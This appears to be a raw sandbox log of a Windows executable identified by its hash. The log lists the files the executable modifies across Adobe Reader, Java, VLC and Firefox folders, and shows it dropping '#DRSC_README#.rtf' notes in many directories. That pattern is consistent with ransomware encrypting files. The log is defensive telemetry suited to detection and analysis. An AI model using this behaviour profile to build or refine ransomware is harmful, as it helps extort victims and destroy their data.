710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\circle_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\download.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_history_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\share.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\FormatTrace.ps1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunec.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_xd.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\az_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javac.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_filter_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightDemiItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\#DRSC_README#.rtf 